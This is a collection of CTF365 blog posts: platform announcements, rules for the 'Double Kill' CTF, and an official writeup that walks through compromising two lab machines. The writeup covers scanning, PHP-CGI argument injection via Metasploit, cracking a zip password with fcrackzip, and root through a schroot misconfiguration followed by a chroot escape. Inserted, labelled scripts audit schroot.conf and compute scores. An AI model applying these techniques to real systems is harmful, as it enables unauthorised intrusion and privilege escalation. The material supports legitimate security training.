We’re proud to announce that we delivered on our promise and, as of today, Windows Azure is here. You will find it in the CTF365 Main Arena.

All of this was made possible by Microsoft’s BizSpark program, a program designed to provide promising startups with exposure, support, and free software. We joined Microsoft’s awesome startup program and, as a result, have been given free Microsoft products for our users.

If you’re interested in starting your own startup project, we encourage you to apply to BizSpark. In addition to getting access to Microsoft products, you’ll receive full support and become a member of a large startup community. The BizSpark program is also helpful if you’re bootstrapped (self funding) like we are. 


Being admitted into the BizSpark startup program, we achieved three things:

  • We’ve gained Microsoft’s recognition as a valuable startup project
  • We’ve demonstrated the flexibility of our platform and proven it to be a state of the art penetration testing lab
  • We’ve given our users the opportunity to train their hacking skills on Windows products such as Windows Server 2008 and Windows Server 2012

By joining the BizSpark startup program, CTF365 Silver and Gold account users will be able to use any Microsoft product in our Main Arena with zero licensing costs. This includes Windows 3.1, Windows XP, Windows Server 2012, SQL Server, SharePoint Server, and several other Microsoft products.

So, what’s next? AWS. That’s right, we’re already working hard to bring Amazon Web Services (AWS) to CTF365. We stated that we provide top notch services for the InfoSec Industry, and that’s exactly what we’re going to do. 



Any questions? Glad to answer.


 

Double Kill CTF Competition – The Rules


Art. 1 “Double Kill” is an offensive CTF (Capture The Flag) competition in which competitors are ranked based on their individual/team skill level and their ability to use their professional skills in compliance with applicable legislation and international Internet communications regulations. The competition’s difficulty level has been designed for participants of beginner and intermediate skill levels.

Art. 2 The “Double Kill” competition is scheduled to commence on July 26 at 15:00 UTC and conclude on July 27 2014 at 15:00 UTC. If, for any reason, the competition cannot be held on the scheduled date mentioned above, the competition will be rescheduled. In the event of a reschedule, participants will receive prior notification detailing the new competition schedule.

Art. 3 To help ensure impartiality and eliminate unfair advantages, all “Double Kill” organizers, staff members, and affiliates are excluded from participating in the competition.

Art. 4 Only those participants who agree to have their name published on the website, http://ctf365.com/, are eligible to be declared a winner and receive the corresponding prize.

Art. 5 The competition will have the following technical rules:

  • The ranking in the competition is based on the time it takes you to complete the challenges. You have 24 hours of VPN access to complete the challenge. The timer stops when you provide the correct “superuser” trophy.
  • The trophies are listed as such:
    • superuser-trophy.txt – found in the home or desktop directory of the superuser (root or Administrator)
    • user-trophy.txt – found in the home or desktop directory of the unprivileged user and may be used to gain a foothold on the machine. This trophy is not present on the machines that can be compromised without elevating your privileges.

    Each trophy file contains a distinct SHA-1 hash encoded as HEX.

  • Attacking our infrastructure is not part of the competition and will result in immediate disqualification. If you’re disqualified, you will not be eligible to win a prize or participate in the raffle.
  • In order to validate your time, we require that you submit a “proof of work” within 24 hours after the competition ends. “Proof of work” includes:
    • a screenshot showing your superuser access or, if you were unable to obtain superuser access, a screenshot showing your unprivileged access.
    • a technical report describing in detail each step needed to compromise the machine.

    We must be able to use your report to reproduce your work. If we are unable to do so, the next contestant with a valid report will replace you. We do not have unlimited resources; therefore, only reports for the prize winning places will be evaluated. You must submit your report and screenshots in an email to support@ctf365.com. To ensure all of the details are readable, your screenshots must be high quality JPEG or PNG files. If the details are not clearly visible in your screenshots, your screenshots will be discarded. Your report must be a text file, a PDF document, or an ODT document. Your report and screenshots must be placed in a single archive file before emailing them to us. Acceptable archive formats include RAR, Zip, Gzip, and Bzip2.

  • After the competition is finished and the winners are announced, we will publish the machine images that took part in our competition. We will also publish some explanations.
  • In the event of a dispute, we may disclose the rejected reports to the competition participants for peer review.
  • You don’t need to waste your stash of 0-days for our competition. All of the challenges are designed by using public exploits and/or software misconfigurations. We use Kali and the basic tools for the purpose of demonstrating the concept of a CTF challenge when we discuss the technical aspects of a competition.
  • The use of mass-vulnerability scanners is discouraged. It will likely drop your VPN connection or freeze the target machine.
  • We don’t provide any hints during the competition. We provide you the same advice as the awesome folks at Offensive Security: Try Harder™. If technical problems are experienced, we will answer properly formulated questions about certain aspects of the competition. A properly formulated question is something like: “I tried to use the foo with the arguments bar over the protocol baz in order to obtain information X”. Do not abuse the support.
  • Submitting a Flag:
    • Use the “Hackers Dome” button in the upper right corner of the CTF365 website (you must be logged in)

  • There are two ways to report technical-related issues (e.g. VPN connection, sending flags):
    • Online on the CTF365 IRC chat, by sending private messages to all operators in the #Lobby channel (IRC server: irc.ctf365.com, channel: #lobby)
    • By e-mail at support@ctf365.com

    Remember that there are hundreds of competitors; therefore, nontechnical issues will be ignored. Please do not abuse our time.

Art. 6 Participants may submit appeals to support@ctf365.com within 24 hours after the competition results become publicly available. Appeals will be reviewed and responded to within 7 days of receipt. Appeal responses will be sent to the appealing participant by e-mail.

Art. 7 The winner’s name will be displayed with their consent on http://hackersdome.com/ and http://www.ctf365.com 14 days after the competition ends.

Art. 8 For premium access prizes, winners will receive their login information and credentials by email.

Art. 9 Players should not interfere with other players’ experience. We may ban you from the competition if you are being reckless, as that is not the purpose of these CTFs.

Win2k8, WinXP, HacmeBank & HacmeCasino – Free Account


When you’re trying to get involved in the information security industry and become a security professional, having access to a fully functional penetration testing lab is critical. The pentest lab is where you’ll develop your skills, learn new tactics, and expand your knowledge. Setting up a pentest lab, however, can be both challenging and expensive. That’s why we created the CTF365 free account, which allows members to access our free online pentest lab.

We already have Metasploitable and bWAPP in the cloud. Now we have more great news for CTF365 free account members. As we promised, we’ve extended our free pentest lab by adding “Hacme Bank” and “Hacme Casino,” courtesy of McAfee Foundstone.

Hacme Bank

“Hacme Bank™ is designed to teach application developers, programmers, architects and security professionals how to create secure software. Hacme Bank™ simulates a “real-world” online banking application, which was built with a number of known and common vulnerabilities such as SQL injection and cross-site scripting.”

You can read the official Hacme Bank documentation HERE.

Hacme Casino

“Hacme Casino™ is a learning platform for secure software development and is targeted at software developers, application penetration testers, software architects, and anyone with an interest in application security.”

You can read the official Hacme Casino documentation HERE.

Also, since we got into the Microsoft BizSpark startup program, CTF365 members can now train their hacking skills against Windows Server 2008 and Windows XP, the OSs that Hacme Bank and Hacme Casino are deployed on.

By adding these components to our free pentest lab, we hope to help newcomers and ethical hacker wannabes find their way into the security industry as qualified security professionals.

If you’re an InfoSec instructor or teacher, feel free to use these applications in the cloud to create webcasts and teach your students. Also, if you’re a screencaster, feel free to use them in your video tutorials. Don’t forget to share your creations and experiences with us. We’d love to hear about them.

You can access the servers at:

http://hacmebank.ctf (http://10.195.2.5)

http://hacmecasino.ctf (http://10.195.2.6)

In order to access them, please remember that you have to be logged into our VPN.

If there’s a vulnerable-by-design server or web app that you’d like to see in the CTF365 cloud, leave the information for us in a comment below. We’ll review it and, if we think it’ll be a valuable contribution, we’ll add it to the cloud in the future.

We believe that entry level resources should be open and free of charge for anyone who wants to dive into the InfoSec industry. Through this, we think we can make the Internet a little bit safer.

CTF365 is a top-notch Security Training Platform with a focus on Security Professionals, System Administrators and Web Developers that offers five-star services for training, learning and improving offensive and defensive web security.

Any questions? Glad to answer.

Stay secure while having fun.


Hacker’s Dome – Double Kill | The Official Writeup


Download links for the machine images:

We recommend running the machine images inside of VirtualBox, which is the hypervisor that we used to create the challenges. Installing and running these images should be trivial.

The credentials for accessing the machines are (updated on 22nd of August, 2014):

  • ctf02-01: ubuntu with 4;9M3kr%5jn0otCca>]eVO.,Vog>ml7[
  • ctf02-02: root with 7m[Y5TNz')6`|@p:JLP"A\#M*6<4J~lz

ctf02-01, IP address: 10.200.0.4

Enumeration:

nmap -sS -p 1-65535 10.200.0.4

Starting Nmap 6.46 ( http://nmap.org ) at 2014-08-13 12:39 EEST
Nmap scan report for 10.200.0.4
Host is up (0.0012s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:DF:18:9D (Cadmus Computer Systems)

Nmap done: 1 IP address (1 host up) scanned in 8.37 seconds

Scan the HTTP server:

nikto -host 10.200.0.4 -C all
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.200.0.4
+ Target Hostname: 10.200.0.4
+ Target Port: 80
+ Start Time: 2014-08-13 12:41:17 (GMT3)
---------------------------------------------------------------------------
+ Server: Apache/2.2.22 (Ubuntu)
+ Retrieved x-powered-by header: PHP/5.3.10-1ubuntu3
+ The anti-clickjacking X-Frame-Options header is not present.
+ Root page / redirects to: /phpMyAdmin-4.2.6-all-languages
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.php
+ Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.7). Apache 2.0.65 (final release) and 2.2.26 are also current.
+ /cgi-bin/perl?-v: Perl is installed in the CGI directory. This essentially gives attackers a system shell. Remove Perl from the CGI dir.
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ Server leaks inodes via ETags, header found with file /icons/README, inode: 284076, size: 5108, mtime: Tue Aug 28 13:48:10 2007
+ OSVDB-3233: /icons/README: Apache default file found.
+ OSVDB-: /?-s: PHP allows retrieval of the source code via the -s parameter, and may allow command execution. See http://www.kb.cert.org/vuls/id/520827
+ 22354 requests: 0 error(s) and 13 item(s) reported on remote host
+ End Time: 2014-08-13 12:42:51 (GMT3) (94 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

The most interesting information comes from the “OSVDB-: /?-s” line: PHP allows retrieval of its source code via the -s parameter, which is CVE-2012-1823. This means that PHP is vulnerable to argument injection, which can be used to achieve remote code execution.

[Screenshot: ctf02-01-php-source-code]

Metasploit's php_cgi_arg_injection module is appropriate for getting a foothold on this machine.

[Screenshot: ctf02-01-foothold]

Side note: /cgi-bin is actually linked to /usr/bin. The above vulnerability is not required to gain a foothold. You do have to get a little bit creative in order to exploit the machine via this method, but I'm leaving this out as homework.

As the machine runs the 3.2.0-23-generic kernel, you can find an exploit for it on exploit-db.com.

From there, getting to root is really easy given that gcc is already installed for your convenience.

[Screenshot: ctf02-01-pwn]

ctf02-02, IP address: 10.200.0.6

This machine was a pain in the ass for most of you, but you may learn some new things while trying to take it down.

Enumeration:

nmap -sS -p 1-65535 10.200.0.6

Starting Nmap 6.46 ( http://nmap.org ) at 2014-08-13 13:48 EEST
Nmap scan report for 10.200.0.6
Host is up (0.00072s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:48:04:9C (Cadmus Computer Systems)

Nmap done: 1 IP address (1 host up) scanned in 9.19 seconds

Using scanners like nikto doesn't really help on this target:

nikto -host 10.200.0.6 -C all
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.200.0.6
+ Target Hostname: 10.200.0.6
+ Target Port: 80
+ Start Time: 2014-08-13 13:50:18 (GMT3)
---------------------------------------------------------------------------
+ Server: Apache/2.2.22 (Debian)
+ Server leaks inodes via ETags, header found with file /, inode: 262222, size: 150, mtime: Fri Jul 25 23:31:47 2014
+ The anti-clickjacking X-Frame-Options header is not present.
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.html
+ Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.7). Apache 2.0.65 (final release) and 2.2.26 are also current.
+ Allowed HTTP Methods: POST, OPTIONS, GET, HEAD
+ OSVDB-3233: /icons/README: Apache default file found.
+ 22354 requests: 0 error(s) and 7 item(s) reported on remote host
+ End Time: 2014-08-13 13:51:30 (GMT3) (72 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Moving forward, there are a couple of viable methods that we can use. They both take about the same amount of time.

First method: read the source code of the index, then go to the directory indicated by the served image:

[Screenshot: ctf02-02-manual-analysis]

The second method is to use DirBuster with a directory list like /usr/share/dirbuster/wordlists/directory-list-1.0.txt. It should quickly log interesting information such as:

dirbuster
Starting OWASP DirBuster 1.0-RC1
Starting dir/file list based brute forcing
Dir found: /cgi-bin/ - 403
Dir found: / - 200
Dir found: /i-can-has/ - 200
File found: /i-can-has/credentials.zip - 200
Dir found: /icons/ - 403

Anyway, the result is the same:

[Screenshot: ctf02-02-i-can-has]

From here, getting something useful will take some time, but it isn't impossible:

wget http://10.200.0.6/i-can-has/credentials.zip
--2014-08-13 13:59:51-- http://10.200.0.6/i-can-has/credentials.zip
Connecting to 10.200.0.6:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 248 [application/zip]
Saving to: `credentials.zip'

100%[=============================================================>] 248 --.-K/s in 0s

2014-08-13 13:59:51 (31.7 MB/s) - `credentials.zip' saved [248/248]

unzip credentials.zip
Archive: credentials.zip
[credentials.zip] credentials.txt password:
skipping: credentials.txt incorrect password

fcrackzip --dictionary --use-unzip --init-password /usr/share/wordlists/rockyou.txt credentials.zip

PASSWORD FOUND!!!!: pw == arisha786

unzip credentials.zip
Archive: credentials.zip
[credentials.zip] credentials.txt password:
extracting: credentials.txt

cat credentials.txt
foobar:r+:/,3{0WU<5%"OxDa=c=E)7%JMI35"R

This challenge also tries to prove a point about using a weak password to protect your password vault.

With this new information, getting a foothold is easy:

[Screenshot: ctf02-02-foothold]

However, moving on from this point may not be so easy. Some of you tried to hit the machine with every exploit that’s even remotely close to what the machine is actually running. Some of you even used 32-bit exploits, even though the machine runs a 64-bit build.

During the competition I gave you an important hint: stop doing what you’re doing and start enumerating. Those who listened moved on to the next step.

Here’s what most of you missed on a fully patched machine: the binaries with the setuid attribute.

[Screenshot: ctf02-02-setuid-enum]

This enumeration shows a couple of important bits: the presence of /usr/bin/schroot and the presence of another userland in /srv/buildd. A little bit of RTFM on schroot (man schroot, man schroot.conf) reveals the next clue:

cat /etc/schroot/schroot.conf
[buildd]
description=buildd
aliases=buildd
type=directory
directory=/srv/buildd
root-groups=foobar
personality=linux

The interesting line from the above config file is: root-groups=foobar. The manual explains why:

root-users=user1,user2,…
A comma-separated list of users which are allowed password-less root access to the chroot. If empty or omitted, no users will be allowed root access without a password (but if a user or a group they belong to is in users or groups, respectively, they may gain access with a password). See the section “Security” below.

You just need to read the help of schroot to figure out that the minimum set of options for getting into the chroot as root is: schroot -u root -c buildd.

[Screenshot: ctf02-02-chroot-root]

The challenge isn’t over yet, as you need to escape the chroot. The easiest method is to set the setuid attribute on a binary owned by root inside the chroot, then execute that binary from the host machine:

[Screenshot: ctf02-02-pwn]

As the userland from inside the chroot is 32-bit while the host is 64-bit, you need to copy the binary from the host to a location which is available to the chroot.

You can pwn a chroot the hard way by doing a chroot evasion. I am leaving this part as homework. Doing a file transfer or editing files from inside the chroot isn’t covered by the usual suspects, so you might learn something new if you try this.
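As a defender-side check for the schroot misconfiguration described above, here is an added Python script (not part of the original writeup) that flags root-users/root-groups grants in schroot.conf and lists setuid-root files inside the granted chroot directory; the [buildd] profile is the one from the writeup, the [sandbox] profile is constructed for contrast.

```python
"""Audit schroot.conf for password-less root grants and setuid-root files in chroots."""
import configparser
import os
import stat

# Sample config: [buildd] as shown in the writeup, [sandbox] constructed as a safe profile.
SAMPLE_SCHROOT_CONF = """\
[buildd]
description=buildd
aliases=buildd
type=directory
directory=/srv/buildd
root-groups=foobar
personality=linux

[sandbox]
description=unprivileged sandbox
type=directory
directory=/srv/sandbox
users=alice,bob
"""

# Either key grants root inside the chroot without a password (see man schroot.conf).
ROOT_KEYS = ("root-users", "root-groups")


def audit_schroot_conf(text):
    """Return [(profile, key, principals, directory)] for every password-less root grant."""
    parser = configparser.ConfigParser(interpolation=None)
    parser.read_string(text)
    findings = []
    for profile in parser.sections():
        section = parser[profile]
        for key in ROOT_KEYS:
            value = section.get(key, "").strip()
            if not value:
                continue
            principals = [p.strip() for p in value.split(",") if p.strip()]
            findings.append((profile, key, principals, section.get("directory", "")))
    return findings


def mode_is_setuid_root(mode, uid):
    """True for a regular file owned by uid 0 that carries the setuid bit."""
    return stat.S_ISREG(mode) and bool(mode & stat.S_ISUID) and uid == 0


def find_setuid_root(root_dir):
    """List setuid-root regular files under root_dir, e.g. a type=directory chroot.

    A setuid-root binary planted inside the chroot is executable from the host with
    the same privileges, which is exactly the escape the writeup describes.
    """
    hits = []
    for dirpath, _dirs, files in os.walk(root_dir):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: never follow symlinks out of the tree
            except OSError:
                continue
            if mode_is_setuid_root(st.st_mode, st.st_uid):
                hits.append(path)
    return sorted(hits)


if __name__ == "__main__":
    for profile, key, who, directory in audit_schroot_conf(SAMPLE_SCHROOT_CONF):
        print(f"[{profile}] {key}={','.join(who)} grants password-less root in {directory}")
        if os.path.isdir(directory):
            for path in find_setuid_root(directory):
                print(f"  setuid-root file inside chroot: {path}")
```

On a live system, feed it the contents of /etc/schroot/schroot.conf; listing the chroot directory needs read access to it.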

Hacker’s Dome – Double Kill | The Winners


First, I’d like to apologise for the long wait. If there’s someone to blame, then that’s me. Unfortunately, some things won’t go as planned.

The winners are as follows:

1st Place – Team dcua with 26618.2 points

2nd Place – Team L0lzSecta (lm456nwifn’s one man army) with 32863.6 points

3rd Place – _JogiT4_ (single player) with 35895.3 points

The points are a function of time: t1 * w1 + t2 * w2. The lowest score wins.

  • t1 = number of seconds needed for sending the ctf02-01 superuser flag
  • w1 = the weight coefficient for t1, in this case 0.7 as the machine had much lower difficulty than ctf02-02
  • t2 = number of seconds needed for sending the ctf02-02 superuser flag
  • w2 = the weight coefficient for t2, in this case 0.3

Users without a team (like _JogiT4_) were treated as members of a team with the same name as their username, in order to simplify the filtering of the submission table. Only the first submitted flag for a team was considered relevant. Duplicate submissions from the same team were dropped.

The reference timestamp is 2014-07-26 15:00:00 UTC aka the start of the competition. The full submission table, after removing the duplicates:

User | Team | Flag | Type | Timestamp
weezel | justsecuritythings* | ctf02-02 | user | 2014-07-26 15:22:59 UTC
solarwind | dcua | ctf02-02 | user | 2014-07-26 15:49:03 UTC
HelloWorld | ManSec* | ctf02-01 | user | 2014-07-26 16:22:22 UTC
Pendrak0n | Team 1D0wn* | ctf02-01 | user | 2014-07-26 16:24:20 UTC
solarwind | dcua | ctf02-01 | user | 2014-07-26 17:07:18 UTC
jack192 | Team 1D0wn* | ctf02-01 | su | 2014-07-26 17:27:17 UTC
sasch9r | sasch9r* | ctf02-01 | su | 2014-07-26 18:00:46 UTC
blawrg | t3uf3l_hund3n* | ctf02-01 | user | 2014-07-26 18:06:20 UTC
weezel | justsecuritythings* | ctf02-01 | user | 2014-07-26 18:25:50 UTC
n0psl3d | Shoop Da Whoop Crew* | ctf02-01 | user | 2014-07-26 18:39:02 UTC
vis1t0r | t3uf3l_hund3n* | ctf02-01 | su | 2014-07-26 18:59:57 UTC
hando | Quantum Security* | ctf02-01 | user | 2014-07-26 19:29:56 UTC
hando | Quantum Security* | ctf02-01 | su | 2014-07-26 19:45:09 UTC
zealias | Team 1D0wn* | ctf02-02 | user | 2014-07-26 19:54:39 UTC
blawrg | t3uf3l_hund3n* | ctf02-02 | user | 2014-07-26 19:56:04 UTC
n0psl3d | Shoop Da Whoop Crew* | ctf02-02 | user | 2014-07-26 19:56:55 UTC
_JogiT4_ | _JogiT4_ | ctf02-01 | user | 2014-07-26 20:08:52 UTC
_JogiT4_ | _JogiT4_ | ctf02-01 | su | 2014-07-26 20:09:03 UTC
_JogiT4_ | _JogiT4_ | ctf02-02 | user | 2014-07-26 20:40:05 UTC
JuraGHH | GHH* | ctf02-01 | user | 2014-07-26 20:52:34 UTC
n0psl3d | Shoop Da Whoop Crew* | ctf02-01 | su | 2014-07-26 21:01:37 UTC
mackwage | mackwage* | ctf02-02 | user | 2014-07-26 21:08:30 UTC
hando | Quantum Security* | ctf02-02 | user | 2014-07-26 21:26:42 UTC
ymgve | Rule110* | ctf02-02 | user | 2014-07-26 21:38:48 UTC
solarwind | dcua | ctf02-01 | su | 2014-07-26 22:05:31 UTC
solarwind | dcua | ctf02-02 | su | 2014-07-26 23:05:55 UTC
lm456nwifn | L0lzSecta | ctf02-02 | user | 2014-07-26 23:38:01 UTC
lm456nwifn | L0lzSecta | ctf02-01 | user | 2014-07-26 23:50:02 UTC
lm456nwifn | L0lzSecta | ctf02-02 | su | 2014-07-26 23:59:49 UTC
lm456nwifn | L0lzSecta | ctf02-01 | su | 2014-07-27 00:11:07 UTC
t.vovan | Rainbow Ponies* | ctf02-02 | user | 2014-07-27 00:21:33 UTC
hexxus | justsecuritythings* | ctf02-01 | su | 2014-07-27 01:09:52 UTC
sxinjection | titties-sec* | ctf02-02 | user | 2014-07-27 01:15:58 UTC
ymgve | Rule110* | ctf02-01 | user | 2014-07-27 02:37:15 UTC
omartinex | OrionGalaxy* | ctf02-01 | user | 2014-07-27 04:10:05 UTC
unleashedmen | Ping-Pwn3d* | ctf02-01 | user | 2014-07-27 04:16:32 UTC
unleashedmen | Ping-Pwn3d* | ctf02-01 | su | 2014-07-27 04:28:57 UTC
sxinjection | titties-sec* | ctf02-01 | user | 2014-07-27 06:50:27 UTC
sxinjection | titties-sec* | ctf02-01 | su | 2014-07-27 06:50:40 UTC
JuraGHH | GHH* | ctf02-02 | user | 2014-07-27 09:18:05 UTC
JuraGHH | GHH* | ctf02-01 | su | 2014-07-27 09:31:47 UTC
purpette | Purpettes* | ctf02-01 | user | 2014-07-27 11:22:11 UTC
_JogiT4_ | _JogiT4_ | ctf02-02 | su | 2014-07-27 12:13:04 UTC
ymgve | Rule110* | ctf02-01 | su | 2014-07-27 12:35:29 UTC
Zeta Two | Death Dragons 666* | ctf02-01 | user | 2014-07-27 13:47:40 UTC
Zeta Two | Death Dragons 666* | ctf02-01 | su | 2014-07-27 14:58:56 UTC
 * DNF (Did Not Finish)
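To show how the ranking above follows from the submission table, here is an added Python script (not part of the original post) that applies the t1 * w1 + t2 * w2 formula and the first-flag-per-team rule to a subset of the table; the empty team field and the late duplicate row are constructed to exercise the teamless-player and deduplication rules.

```python
"""Score Hacker's Dome Double Kill submissions: score = t1*w1 + t2*w2, lowest wins."""
from collections import defaultdict
from datetime import datetime, timezone
from decimal import Decimal

# Reference timestamp: the start of the competition, as stated in the post.
START = datetime(2014, 7, 26, 15, 0, 0, tzinfo=timezone.utc)
# Weight of each machine's superuser flag (0.7 for the much easier ctf02-01).
WEIGHTS = {"ctf02-01": Decimal("0.7"), "ctf02-02": Decimal("0.3")}

# Rows in "user|team|flag|type|timestamp" form. The first nine rows are copied from the
# published table (an empty team field models a teamless player); the final row is a
# constructed duplicate that the first-flag-per-team rule must drop.
SAMPLE_TABLE = """\
# user|team|flag|type|timestamp
solarwind|dcua|ctf02-02|user|2014-07-26 15:49:03 UTC
hando|Quantum Security|ctf02-01|user|2014-07-26 19:29:56 UTC
hando|Quantum Security|ctf02-01|su|2014-07-26 19:45:09 UTC
_JogiT4_||ctf02-01|su|2014-07-26 20:09:03 UTC
solarwind|dcua|ctf02-01|su|2014-07-26 22:05:31 UTC
solarwind|dcua|ctf02-02|su|2014-07-26 23:05:55 UTC
lm456nwifn|L0lzSecta|ctf02-02|su|2014-07-26 23:59:49 UTC
lm456nwifn|L0lzSecta|ctf02-01|su|2014-07-27 00:11:07 UTC
_JogiT4_||ctf02-02|su|2014-07-27 12:13:04 UTC
# constructed duplicate: a second dcua member resubmits the ctf02-02 root flag later
teammate|dcua|ctf02-02|su|2014-07-27 12:30:00 UTC
"""


def parse_table(text):
    """Yield (team, flag, kind, seconds_since_start) for each data row."""
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        user, team, flag, kind, stamp = (f.strip() for f in line.split("|"))
        # A player without a team counts as a one-person team named after the user.
        team = team or user
        ts = datetime.strptime(stamp, "%Y-%m-%d %H:%M:%S UTC").replace(tzinfo=timezone.utc)
        yield team, flag, kind, int((ts - START).total_seconds())


def first_root_flags(rows):
    """Map team -> {machine: seconds}, keeping only the earliest superuser flag per machine."""
    firsts = defaultdict(dict)
    for team, flag, kind, secs in sorted(rows, key=lambda r: r[3]):
        if kind != "su":
            continue  # user flags do not affect the ranking
        firsts[team].setdefault(flag, secs)  # later duplicates from the same team are dropped
    return firsts


def rank_teams(text):
    """Return (ranking, dnf): ranking is [(team, score)] ascending, dnf the incomplete teams."""
    firsts = first_root_flags(parse_table(text))
    ranking, dnf = [], []
    for team, flags in firsts.items():
        if set(flags) != set(WEIGHTS):
            dnf.append(team)  # missing a superuser flag: did not finish
            continue
        score = sum(Decimal(flags[machine]) * w for machine, w in WEIGHTS.items())
        ranking.append((team, float(score)))
    ranking.sort(key=lambda item: item[1])
    return ranking, sorted(dnf)


if __name__ == "__main__":
    ranking, dnf = rank_teams(SAMPLE_TABLE)
    for place, (team, score) in enumerate(ranking, 1):
        print(f"{place}. {team}: {score} points")
    print("DNF:", ", ".join(dnf))
```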

Hattrick CTF Competition – Free Access


We all love CTF competitions because they are challenging and fun, improve your hacking skills, and forge new friendships. After First Blood and Double Kill, we proudly announce Hattrick.

Difficulty Grade: Beginner/Intermediate

Format: Team Based

Starting Date: October 17 2014 15:00 UTC

Ending Date: October 19 2014 15:00 UTC

Rules: Yet to come :-)

Hattrick will be special because it will be Windows based and will include cryptography, MitM (man in the middle) and more.

The Prizes:

First Place:

One year CTF365 Premium Access (because you love to train your skills)

Second Place:

6 Months CTF365 Premium Access (because you love to train your skills)

Third Place:

3 Months CTF365 Premium Access (because you love to train your skills)

More surprise prizes yet to come. 

Prepare your PenTest tools, tell your friends, challenge your enemies and get ready for the competition.

In order to participate, all you have to do is register at CTF365.

CTF365 – Open For Business


This article is for security professionals and system administrators who work for SMEs (Small and Medium Enterprises) and corporations. It’s also for security department/team leaders, system administration department/team leaders, CISOs, CSOs, CIOs, CTOs, and CEOs.

With so many enterprises being breached by hackers lately, it’s clear that SMEs and corporations need to find more effective information security training solutions for their employees. With the help of specially designed security testing and training labs, this is something that can be easily achieved.


At CTF365, our goal is to provide an information security training platform that simulates the real-world Internet and allows users to convert theoretical knowledge into practical training. Through this approach, security professionals, system administrators, and web developers are able to complete training and testing exercises in an environment that is made up of real servers controlled by real users.

To maintain the integrity of CTF365’s focus on practical training, users are not allowed to host vulnerable-by-design servers in the Main Arena. This means, if you locate a vulnerability within the Main Arena, it’s an unintentional vulnerability. This is the real value and beauty of CTF365.

7 months ago, we launched CTF365’s Bronze account for individual security professionals and students. Today, we are proud to announce that we’re open for business to SMEs and corporations.

Silver Account: Used for offensive and defensive security training, testing new tools, experimenting with new tactics, traffic analysis, and engaging in other exercises that are typically forbidden on the real-world Internet.

Gold Account: Used like the Silver account, but comes with additional features, such as:

  • Team Activity Report – a feature that helps team leaders monitor their team’s performance.
  • Monitored Services – a feature that is designed to notify you of interrupted services and help keep your setup operational without the need to be connected to CTF365 24/7.

Who CTF365 is for (but not limited to):

  • Security Training Companies – educational, continuous training, learning, and improvement
  • InfoSec Vendors (Cisco, McAfee, Rapid7, etc.) – product testing through gamification and crowdsourcing
  • InfoSec Organizations (OWASP, ENISA, etc.) – improving and increasing Internet security awareness
  • InfoSec Conferences – entertaining, challenging, and community driven
  • Security Management Companies – continuous training and improvement
  • Red, Blue, CERT/CSIRT Teams
  • Information Security Recruiters
  • CS Faculties – educational, challenging, and hands-on
  • Web Development Companies – improving and training for defensive security
  • Web Hosting Companies – defensive security training
  • Data Centres

At this moment, there are more than 100 servers and 250 web applications in the Main Arena.

Because of its flexibility, CTF365 can be connected to your existing core training capabilities as an add-on layer or it can be used as a standalone solution to improve your organization’s core security training capabilities.

CTF365 is not just another simple penetration testing lab; it’s a living, dynamic information security environment with real users (19,500+ and counting) and real servers. This is the beginning of a great journey, and we’re committed to adding great features and functionalities over time to make sure that CTF365 becomes the first choice for information security training, learning, and improving.

Any questions? Glad to answer.

About CTF365: CTF365 is a top-notch Security Training Platform for the IT industry with a focus on Security Professionals, System Administrators and Web Developers that offers five-star services for training, learning and improving offensive and defensive web and network security.

The Platform implements CTF concepts and leverages gamification mechanics to improve retention rates and speed up learning/training curves when it comes to Information Security.




CTF365: Why It Rocks – Two Years Startup Journey


The concept that drives CTF365 was inspired by the Internet, guided by capture the flag (CTF) competitions, and specially crafted for the ICT industry. CTF365 provides a platform where users and teams can train and improve their offensive and defensive security skills.

At CTF365, our goal is to provide a security training platform that simulates the real-world Internet. Through this approach, we’re able to provide security professionals, system administrators, and students with a place where they can convert theoretical knowledge into practical training. In addition, web developers can leverage CTF365’s user base to help discover vulnerabilities in their web applications. This helps web developers write security conscious code and produce safer web applications.

Why It Rocks:

Free Access to “Vulnerable by Design – In The Cloud”

“We believe that entry level resources should be open and free of charge for anyone who wants to dive into the InfoSec industry. Through this, we think we can make the Internet a little bit safer.”

CTF365’s Basic account holders receive free access to some of the most popular vulnerable-by-design servers and web applications available. This includes Metasploitable2 from Rapid7/Metasploit, bWAPP from Malik Mesellem, HacmeBank and HacmeCasino from McAfee/FoundStone. In the future, we’ll be adding more goodies designed for security newcomers.

By adding these components to our free penetration testing lab, we want to help security newcomers and ethical hacking beginners find their way into the security industry as qualified security professionals.

Also, because we were accepted into the Microsoft BizSpark startup program, CTF365 members can now train with Windows Server 2008 and Windows XP for FREE. These are the same operating systems that HacmeBank and HacmeCasino are deployed on.

If you’re an InfoSec instructor or teacher, feel free to use these applications in the cloud to create webcasts and teach your students. We also encourage screencasters to create video tutorials with them. All we ask is that you don’t forget to share your creations and experiences with us. We’d love to hear about them.

